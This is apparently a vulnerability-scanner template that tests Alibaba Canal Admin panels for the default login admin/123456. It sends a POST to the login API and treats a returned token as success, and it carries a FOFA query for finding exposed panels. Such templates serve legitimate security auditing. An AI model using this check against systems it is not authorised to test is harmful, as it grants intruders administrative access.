id: alibaba-canal-default-password

info:
    name: Alibaba Canal Default Password
    author: jweny(https://github.com/jweny)
    severity: high
    description: fofa title="Canal Admin"

rules:
    r1:
        request:
            method: POST
            path: /api/v1/user/login
            headers:
                Content-Type: application/json
            body: '{"username":"admin","password":"123456"}'
        expression: response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
expression: r1()
